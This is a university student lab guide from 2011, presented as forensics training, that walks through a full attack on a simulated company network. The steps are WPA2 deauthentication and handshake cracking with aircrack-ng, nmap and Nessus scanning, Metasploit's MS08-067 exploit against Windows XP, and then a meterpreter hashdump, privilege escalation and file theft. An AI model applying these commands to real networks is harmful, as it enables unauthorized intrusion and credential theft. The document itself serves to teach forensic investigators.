IST454Section001
TeamAlphaVideoHands‐onLabProjectDemonstratingNetworkCrackingandExploitation
Brian Pinchak, Tim Nary, Garrett Miller, Chase Tralka, Jonathan Ring, Kenton Martin 4/7/2011
Page 1 of 12
Introduction
Aswirelesstechnologycontinuestogrowandimprove,thedemandforcomputerforensicspecialiststokeepupwithitbecomesequallyimportant.Youasaforensicexaminermaybecalledtothesceneofacorporatecompanyhitbyanattackandaskedtoperformnetworkforensicstohelpputtogetherthesequenceofeventsanddiscoverhowtheattackwassuccessful.
Thisvideolabwillcovercommonnetworkexploittechniquesanattackercanuseto
breakintoawirelessnetworkandstealsensitiveinformation.Wehopetoillustratetotheclassthepossibledangersofpoorly‐protectedcomputernetworksalongwithscenarioscyberforensicspecialistsmayfindthemselvescalledintoinvestigate.Thisprojectwillshowtheimportanceofnetworkforensicsinthefield.
Forthislab,youwillbeintroducedtoJimwhoworksforaverysuccessfulITfirm.Jim
hassetupawirelessnetworkforhimselfwithinhiscubicle(againstcompanypolicy)sohecanmovefreelyaboutthebuildingwithhislaptop.UnfortunatelyheusesaweakWPA2encryptionkeyandcompromisestheentiresecurityofthecompany.Theclass,ateamofhighlytrainedforensicspecialistshavetofigureouthowthisattackhappened.
Thetoolsintroducedinthislabwillbe:
UbuntuLinux‐Ubuntuisafree,lightyetpowerfulopensourceoperatingsystembasedontheDebianGNU/Linuxdistribution.Thecommandsyouwillseeexecutedinthevideolabwillbeperformedonthisoperatingsystem. Aircrack‐ngSuite‐AirCrack‐ngisanetworksoftwaresuiteconsistingofseveralpowerfulwireless sniffing, analysis, and password cracking tools geared toward popular wirelessencryptionschemessuchasWEPandWPA/WPA2‐PSK.Wireshark‐WiresharkisanopensourcePacketAnalyzer.Thissoftwarecapturespacketsoffofaphysicalorwirelessnetworkandprovidesanalyticaltoolstofilterandanalyzetheirpackettraffic.Agreattooltouseforforensics;howeverforthepurposesofthislabwewillshowhowattackerscanuseitfortheiradvantageaswell.Nmap‐Nmapisafreeopensourcenetworkmappingutilityusedfornetworkexplorationorsecurityauditing.Forthislabwewillshowthenetworkexplorationaspect.Nessus‐Nessusisacomprehensivevulnerabilityscanningprogramwhichcanshowverydetailedreportsonpossibleexploitablefailurepointsonasysteminwhichitscans.Metasploit‐Metasploitisafree,opensourcepenetrationtestingutilitywhichcomeswithmanypreloadedknownvulnerabilitiescapableofexploitingasystem.
Page 2 of 12
SectionI:AttackingaWPA2‐EncryptedNetwork
ThefirstphaseofthisvideolabcoversattackingintoawirelessWPA2encryptednetwork. 1.First,loaduptheUbuntuoperatingsystemfollowedbytheterminalandbecomingtherootuserofthesystem.Todothis,typethefollowingintotheterminal:
sudo su
Afteryouenterinyourpasswordyouraccountshouldnowshowroot. 2.Afterrootprivilegesareacquired,youmustnowdeterminewhatattachedwirelessdeviceinterfacesareonthesystem,thisisimportantasthedeviceinterfacewillbeneededforfuturecommands.Tocheckthistypethefollowingcommandintoyourterminal: iwconfig
Youshouldgetanoutputsimilartothescreenshotabove.Lookforyourwirelesswlan0interface. 3.NowthatwehavediscoveredourinterfaceitistimetoplaceourwirelessadapterintomonitormodeusingAirmon‐ng.Monitormodeallowsourwirelesscardtoseealltraffic/packetsreceivedfromthewirelessnetworkswithouthavingtoassociatewiththosenetworkaccesspoints(routers).TosetourcardtothismodewewilluseAirmon‐ngwhichispartoftheAircrackSuite.Typethefollowingcommandintoyourterminal: airmon‐ng start wlan0
Page 3 of 12
Youshouldhaveanoutputsimilartotheoneabove,indicatingyourwirelessinterfaceisnowenabledinmonitormode,forourpurposesonmon0.
4.NowthatwehaveamonitorinterfaceitistimetorunAirodump‐ngtofindpotentialnetworkstoattackthatareinrange.Todothistypeintoterminal: airodump‐ng mon0
AirodumpwillstartscanningatrandomallwirelesschannelsandinyourterminalyouwillgetanoutputofinformationonthenetworksitcapturessuchastheBSSIDaddress,trafficactivity,channel,encryptiontype,ESSID,andassociatedstationswhichareclientscurrentlyconnectedtothenetwork.
5.Youastheattackerhaveidentifiedanetworkofinterestcalled“Jim’sCubicle”.Wecannowlimitourpacketcapturestoonlythatspecificchannelandnetworkbytypingthefollowingintotheterminal: airodump‐ng ‐w wpacap ‐‐channel <channel #> mon0
The–wflagindicatesthefilenameprefixforthefilewhichwillcontainthecapturednetworkpackets.Alsowhilenotusedinthisvideo,youcanalsofurthernarrowyourcapturerangebyBSSIDonlyincasethechannelinwhichyourtargetisonisalsofilledwithadditionalnetworks.
Page 4 of 12
6.NowthatAirodumpiscapturingpacketsonourpreferrednetwork,weseethereisaclient,Jim,currentlyactiveonhisnetwork,wemustdeauthenticatehimandforcehismachinetoreconnectwhilewearecapturingthenetworkpackets.InthecaseofWPAencryptionthiswillgeneratea4‐wayhandshakewhichwecancracktofindthepasswordkey.Todeauthenticateaclient,firstopenanewterminalwindow.NowrunAireplay‐ngusingadeauthenticationattackonthewirelessnetworkusingtheBSSIDoftherouter.Thiswillallowairodumptocapturehandshakedatatohelpcrackthepassword.Typethefollowing:
aireplay‐ng ‐a <BSSID> ‐‐deauth 100 mon0
The–aflagwilldeauthenticateallclientswiththetargetBSSID,inthiscase,Jim’sCubicle.Youroutputwillshowifthedeauthenticationwassuccessfulandifahandshakewascaptured. 7.NowthatwehaveourcapturedWPA2handshake,wecanstartthecrackingprocessbyusingadictionaryattack.OpenathirdterminalwindowandrunAircrack‐ngtofindthepassword.Typethefollowingcommandintoyourterminal:
aircrack‐ng ‐a 2 ‐w <path of GDictLab.txt><path of capture file>
Aircrackwillnowuseourcapturedpacketsfilewiththehandshakeandrunitagainstourdictionaryfilegdict.txt.Thisprocesscouldtakehoursorevendaysdependingonthecomplexityofthepasswordandtherulescreatedwithourpasswordcracker.However,Jim’spasswordisweak.
Onceyouhavediscoveredthepassworditistimetoaccessthenetwork.
Page 5 of 12
SectionII:CapturingNetworkTrafficandExploration
8.Nowthatwehavegainedaccesstothenetwork,weneedtoknowwhatisonthenetworkandpossiblecaptureadditionalinformationwhichcanhelpaidinourdeeperinfiltrationofthenetworkandescalationofourattack.YoumaynowclosedownyourAircrack‐ngsuiteandopenupWireshark.YoucanopenuptheprogramthroughUbuntu’sguideduserinterfaceorthroughterminal.Throughterminaltypethefollowingcommand:
sudo wireshark
9.NowthatWiresharkisloadedupitistimetostartcapturingpackets.Tostartcapturingpacketsclickingontheinterfaceiconatthetop‐leftofthescreen:
10.ThiswillbringupalistofpossibleinterfacesWiresharkcancapturefrom,inourcasewewanttocapturefromtheinterfaceconnectedtoJim’snetwork.Selectwlan0andclickstart.Wiresharkwillnowbegintocapturepacketswhichyouastheattackercansaveforlateranalyses.Thesecapturedpacketscouldrevealpasswordsorotherinformationtohelpfurtherourattack.
WithWiresharksniffingthenetwork,weneedtoalsoperformascanofthenetworktodeterminewhatkindofmachinesareonthenetworkandpossibleoperatingsystems,services,andportsopenonthesemachineswhichwecanusetopossiblyexploitsystemsoverthenetwork.
11.ToperformthisscanyouwillneedtouseanetworkutilitycalledNmap.Youwillneedtoscaneverythingonthenetwork,toperformthisscanopenupaterminalandtypeinthefollowingcommand:
sudo nmap –a 192.168.56.0/24
Page 6 of 12
Thiscommandwillscanthenetworkanditssubnetandoutputinformationsuchascomputers,operatingsystems,andservicesrunning.Yourscansshouldoutputsomethingsimilartothefollowing:
YoucanseethatthereisahostuprunningWindowsXPalongwiththeservicesrunningandportsopen.
Wehavealmostcollectedenoughinformationtoescalateourattack.Wehaveexploredthenetwork,analyzedthetrafficandtheconnectedhosts.ItistimetoscantheconnectedWindowsXPmachineandseeifthereareanyunpatchedvulnerabilitieswecanexploit.
12.ToperformvulnerabilityscansloadupNessusonUbuntu.Oncetheguideduserinterfaceisopenyouwillwanttoperformanewscantodothisclickaddonthetoolbar:
13.Youwillbepresentedwithascanmenu.PopulatetheNamefieldwiththeIPaddressofyourtargetandforpolicy,sinceyouarenowwithinthenetwork,youwillwanttochoosean“internalnetworkscan”.Whendoneclick“launchscan”.
Page 7 of 12
14.Nessuswillprepareareportwhichyoucanviewinanumberofformats.WewillchoosetheHTMLdisplaybyclicking“Browse”,selectyourreportandclick“download”.Inthedownloadformatdropboxselect“DetailedHTMLReport”.Nessuswillnowprepareyourreport.
OnceNessusisdoneitshouldpresentyouadetailedreportofvulnerabilitiesitfoundonyourtargetmachine.Inourcase,thiswasthemachinewedetectedearlierwithNmap.
Asyoucansee,themachinewedetectedhasnumerousvulnerabilitieswhichwecantakeadvantageofinourfinalstageofthislab.Keepthisreportopenandcontinuetothenextpage.
Page 8 of 12
SectionIII:Exploitation
Uptothispointyouhavelearnedhowmalicioususersmayinfiltrateanetworkandthefollyofweakpasswords.Youhavelearnedhowtheycanpotentiallyexplorenetworksoncetheyaregivenaccess,andinthisfinalsectionyouwilllearnhowtheycanputallthisinformationtogetherandfinalizetheirattack.
15.NowthatwehaveourNessusReport,itistimetoexploitavulnerabilitydiscoveredinthatreport.WewilldothiswiththeMetasploitframework.Openupaterminalwithrootaccess(asperformedearlierinthislab)andtypeinthefollowing:
msfconsole
Youshouldgetanoutputsimilartothefollowing:
16.OnceloadedgobacktoyourNessusreportandmakenoteoftheMS08‐067exploityoudiscovered.YouwillbeenteringthisintoMetasploit.
17.GobacktoyourterminalwindowwiththeMetasploitframeworkloadedupandtypeinthefollowingmsfconsolecommand:
use exploit/windows/smb/ms08_067_netapi
ThisexploitaffectsavulnerabilityintheSMBserver,usedforWindowsfilesharing.
Afterthecommandisexecutedyoushouldgetthefollowing:
Page 9 of 12
18.Atthispointwewanttousetheshowcommandtoseewhatoptionsthisexploitneedsinordertosucceed.Typeinthefollowing:
show options
19.Youwillseeweneedatarget,wecanshowmetasploitourtargetbytypinginthefollowing:
set rhost 192.168.56.101
Followingbythecommand
exploit
Metasploitwillstarttheexploitandyoushouldseethefollowingoutputifitsucceeded:
MetasploitrantheexploitandnowhasopenedupameterpretersessionwhichwillallowusremoteaccessintothetargetedWindowXPmachine.Atthispointthemachineisinthehandsoftheattackerandtherearenumerouspossibilities.Forourlabhoweverwewill
Page 10 of 12
illustratehowanattackercandumpthepasswordhashesofftheWindowscomputerforpossiblefuturecrackingandgainadministrativeaccessevenfromalimitedaccountandstealvitalinformationfromthecompany’smachine.
20.Firstlet’sperformahashdumpofthepasswords.Inthemeterpreterterminaltypeinthefollowingcommand:
hashdump
Thiswilldropallpasswordhashesonthemachine.
21.Toescalateourprivilegesonthesystemtypeinthefollowingcommand:
getsystem
22.Atthispointtheattackercanbeginlookingaroundforinterestingfiles.Exploretypeinthelinuxcommands:
ls
cd..
tolistfilesanddirectoriesandmoveupdirectories.ForourlablookintotheC:/drivehereyouwillseeafilecalledsecret.txt.txt.Toanattackerthislookspromising.
Page 11 of 12
23.Toviewthecontentsofthisfileinthemeterpreterconsoletypethefollowing:
cat secret.txt.txt
Andyouwillnowfindwhatyouhavebeensearchingfor:
Conclusion
Asyouareabletosee,Jim’srogueaccesspointleadtothecompromiseofhiscompany’ssystems.Jimhadacopyofasecretpasswordfileonhissystemthathethoughtwassafe,howeverpoornetworkencryptionpasswordsandanunpatchedmachinehasledtothisinformationfallingintothewronghandsandyouhavebeenhirednowtofigurethissituationout.Wehaveshownyouhowtobreakintonetworksandcomputersforonereason,soyouasaforensicsspecialistknowthekindsoftoolsthatcanbeused.YoucanlookatnetworklogsandseeasniffingtoolsuchasWiresharkwasused,ascanningtoolsuchasNmapwasused,andcomputerlogstoseehowwehackedintoJim’scomputer.Withthisevidenceyoucanhopefullycatchusandbringustojustice,orattheveryleastgetpoorJimfiredforbreakingcompanypolicyandcostingthemmillions.
Page 12 of 12
WorksCitedThe Ethical Hacker Network. (2011). Retrieved April 7, 2011, from http://www.ethicalhacker.net
Lockhart, A. (2006). Network Security Hacks, Second Edition . O'Reilly Media.
Miller, G. (2010, October 26). Fun with Wireless Seminar. Retrieved April 7, 2011, from Information
Assurence Club: http://iaclub.ist.psu.edu/2010/fun‐with‐wireless‐seminar/
Miller, G. (2010, September 27). Network Eavesdropping Seminar. Retrieved April 7, 2011, from
Information Assurence Club: http://iaclub.ist.psu.edu/2010/network‐eavesdropping‐seminar‐
v2/
Miller, G., & Nary, T. (2010, November 11). Scanning, Probing, Penetrating. Retrieved April 7, 2011, from
Information Assurence Club: http://iaclub.ist.psu.edu/2010/scanning‐probing‐penetrating/
Peikari, C. (2004). Security Warrior. O'Reilly Media.
Wilhelm, T. (2009). Professional Penetration Testing: Creating and Operating a Formal Hacking Lab.